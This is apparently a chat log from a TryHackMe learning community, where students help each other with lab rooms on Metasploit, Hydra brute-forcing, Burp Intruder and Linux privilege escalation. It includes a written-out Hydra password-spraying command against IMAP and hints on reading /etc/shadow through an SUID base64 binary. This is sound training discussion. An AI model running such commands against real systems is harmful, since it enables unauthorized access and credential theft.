Is anyone else having a hard time with Exploit Vulnerabilities task 5? I was able to find the exploit to use against the vulnerable machine, I downloaded it from exploitdb but metasploit still refuses to see it. Is there any other way to execute it against the webserver?
oh shoot silly me
under what section is this?
Its under Vulnerability research. And it is a python script. I wasn't sure if they expected you to use ExploitDB -> Import to msf ->execute
Importing to MSF is when the edb thing is a metasploit module, ruby and they have a fairly rigid structure. You would recognise it quite quickly
I'll try that. Thank you
Gave +1 Rep to @steel nymph
It looked like it imported correctly, but even after updating, I still don't see it at all. I'll just try running the exploit through python
It's python. It's not a ruby msf module.
It wouldn't have imported because it's not built to be imported
I think there are 2 or 3 exploits on exploit-db, one is a ruby intended for msf but the other one is a python and as @idle bison said it is a standalone exploit
Ah. Sorry. Brain is a bit fried right now. Makes sense. Thank you.
Yeah there were a couple that popped up. Brain isn't working on full capacity right now. Thank you, everyone
Don't forget to take some rest
Damn this task 12 of Burpsuite intruder made me realize what a dangerous tool it can be
Also increased my respect for it
knowledge is power
Any words of advice?
figure out how to change it from GET to POST
Protocols and servers 2 task 6 is bane
||hydra -l lazie -P ~/wordlists/rockyou.txt 10.10.252.39 imap|| this is the command I've been using, my wordlist is in a different place ohhhhh wait im gonna try something
Any support available ? I'm not able to launch any Machine, it says Remote Server Error
nobody answers
well thanks @steel nymph i managed but my soul hurts
Gave +1 Rep to @steel nymph
Keep it in the appropriate channel and be patient.
The only official support is by emailing support@tryhackme.com, everything else is volunteers.
I am on Task 6 in the Metasploitexplotation room.
When gaining access to the reverse shell, i believe it is supposed to prompt a meterpreter to allow me to do what i need to do for the next task. This is all i am currently seeing. Have i done anything wrong?
Everything seems correct
Did you set the payload in your handler?
yeah, i have set the payload to the one i created im pretty sure
let me double check
the x86 ?
yep
Control C and then show options in msfconsole
If you change module, it can clear the options
Make sure LHOST is your VPN IP too, although you might be using the THM Kali?
Yeah using the THM kali
when i try to add the .elf shell it doesn't seem to like it
Yeah ^
My payload is the .elf file but not liking it
Oh i think i get it,
the .elf file is for the target system
yes
in task 7 how do i read flag3
as i do not have permissions to edit the contents of etc/passwd i won't be able to add user
i broke passwords of users
of all the three users, but how to read the flag as i am not root nor can i add a user to the /etc/passwd file
yeah so did I, looking at the instructions, I didn't follow those
did you read the instructions, it tells you how to edit the /etc/passwd file
the problem is i can't use nano for reading the file
basically... if you can run a text editor as root, you can basically edit any text that root can
nor can i write to it
why not?
yes
if i was root then why would i add user, i would directly read the flag
Sorry to be pain again.
now that i have the meterpreter access on the target machine. I am supposed to use the hashdump module to get the hash for the question.
Last machine had hashdump on the machine, this one doesn't.
It sounds like a module from msfconsole but not sure. anyone got a little hint?
so yeah its not a text editor but something is suid on this box that can allow you to read files
@steel nymph alright cheers
i got the flag
generally we try not to post the exact way to do something or if you do, spoiler it
or spoiler it, yes so others can figure it out themselves
@steel nymph ahh alright. Yeah just need to figure out how to do it. Gonna do some research
I guess it's also a noun for a collection of dumped hashes
It is where it says use post exploit module. That threw me off
Hey there, you guys know how to do the encode/decode on authentication bypass
I take issue with "other hashes" there, base64 is not a hash
Aside from that, I very much agree with crackstation for cracking unsalted hashes
@steel nymph I figured it out. Performing the post exploit, i am getting an error. Is this something i have done wrong?
Ahh alright
What user are you? What type of shell is it?
just a reverse shell. But i did see a shell option. But my box just expired rip. Gotta do it again haha
i did but i also was able to shell using a shell command
oh ^
i see what u mean, haha im silly. It was a Meterpreter shell xD
hello not sure what I am doing wrong for this one (Password Attack) but it's taking forever, this normal for this task?
hydra -l lazie -P /usr/share/wordlists/rockyou.txt 10.10.180.94 imap
Protocols and Servers 2
I am
thanks will try that
That did it, appreciate it @steel nymph
help We will then add this password with a username to the /etc/passwd file.
linux provesc task 7
I'm getting this error again... :(
sometimes it works sometimes it doesn't
really annoying
Ms17010 is a really finicky exploit
Windows doesn't like it at all
If it fails you need to restart the machine
||point is to read /shadow file with base64 and make it human readable again||
great but i dont get it
u can read it with ||base64||, but u have to make output human readable format again with ||pipe||
YES it worked
finally
If in doubt check gtfo bins
You'll find exactly what you need
Which task?
you don't need to add a user, you need to read shadow and passwd file
but he can answer 2nd q
No. That task is slightly misleading. It's not telling you what you need to do. It's giving you examples of what can be done with an SUID file
I'm trying to use shell_to_meterpreter but it just shows this and doesn't actually do anything
Yea very
What is the password of user2 cat: /etc/shadow: Permission denied
